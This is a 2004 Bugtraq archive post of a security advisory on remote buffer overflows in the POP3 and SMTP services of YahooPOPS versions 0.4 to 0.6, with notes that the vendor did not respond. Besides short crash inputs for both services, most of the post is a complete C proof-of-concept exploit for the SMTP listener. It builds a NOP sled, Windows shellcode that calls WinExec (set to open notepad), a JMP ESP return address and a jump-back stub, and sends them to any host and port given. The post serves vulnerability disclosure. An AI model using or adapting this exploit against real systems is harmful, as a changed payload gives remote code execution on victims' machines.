[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
From:       Hat-Squad Security Team <bugtraq () hat-squad ! com>
Date:       2004-09-27 8:36:46
Message-ID: 20040927083646.11788.qmail () www ! securityfocus ! com
[Download RAW message or body]



Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004 

Product: YahooPOPS! 
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows 
Release Date: 27 September 2004

Vendor Status: 
Informed on 24 September 2004
Response: no response
Description:

YahooPOPs! Is an application that provides POP3 access to Yahoo! Mail. It is \
available on the Windows, Linux, Solaris and Mac platforms. This application emulates \
a POP3 & SMTP server. It also enables popular email clients like Outlook, Netscape, \
Eudora, Mozilla, etc., to download email from Yahoo! accounts. The Latest version of \
this Program is 0.6 and released in 23 May 2004 until now over 120000 users download \
this program. 

Both POP3 and SMTP services have buffer overflow vulnerabilities. The Remote Attacker \
can send specific Request to these services to cause a Stack based buffer overflow \
which could allow a remote attacker to execute arbitrary code or just simply crash \
the service on a vulnerable system.  
Details: 

A YahooPOPS 0.x has the Local SMTP and POP3 engines to send and receive emails. SMTP \
service Dose not Enable By default. Users can enable SMTP by Software Options. 

A POP3 USER request with more than 180 bytes will start to corrupt the heap. 
POP3 request (Dos Attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready 
[USER][180xA][BBBB]

As a result EAX and ECX will be overwritten.

SMTP request:
Sending a request with more than 504 bytes will overwrite ESP and cause a stack based \
overflow.


Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready 
[504xA] [BBBB]

As a result The EIP registers will be overwritten.


Proof of concept demo exploit for YPOP! SMTP listener:

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";


/*- harmless code (tnx to snooq) , will open  notepad on the remote machine */
char code[]= "\x33\xc0"	// xor eax, eax	 slight modification to move esp up
 "\xb0\xf0"		// mov al, 0f0h
 "\x2b\xe0"		// sub esp,eax
 "\x83\xE4\xF0"	// and esp, 0FFFFFFF0h
 "\x55" // push ebp
 "\x8b\xec" // mov ebp, esp
 "\x33\xf6" // xor esi, esi
 "\x56" // push esi
 "\x68\x2e\x65\x78\x65" // push 'exe.'
 "\x68\x65\x70\x61\x64" // push 'dape'
 "\x68\x90\x6e\x6f\x74" // push 'ton'
 "\x46" // inc esi
 "\x56" // push esi
 "\x8d\x7d\xf1" // lea edi, [ebp-0xf]
 "\x57" // push edi
 "\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
 "\xff\xd0" // call eax
 "\x4e" // dec esi
 "\x56" // push esi
 "\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
 "\xff\xd0"; // call eax



   WSADATA wsaData;


   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen,i;
   char *hostname;
   unsigned short port;

  if (argc <= 1)
   {
	  printf("YPOPs! SMTP Overflow\n");
	  printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");
	
      exit(0);
   }

   printf("YPOPs! SMTP Overflow\n");
   printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("25");

   

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
	  printf("%s",hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "220");
   if (check == NULL)
   {
      printf("ERROR: NO  response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }
  
 plen=504-sizeof(code);
   memset(overflow,0,sizeof(overflow));
  
   for (i=0; i<plen;i++){strcat(overflow,"\x90");}  

   strcat(overflow,code);
   strcat(overflow,ret_code);
   strcat(overflow,jump_back);
   strcat(overflow,"\n");
  
   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Exploit Sent.\n");
  
   closesocket(sockfd);
   WSACleanup();
   return 0;
}

--------------------------------------------------------------------------

Vendor response: no response

Credits:

This vulnerability has been discovered by Nima Majidi (nima_majidi@hat-squad.com)

The Original advisory could be found at: 

http://www.hat-squad.com/en/000075.html


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic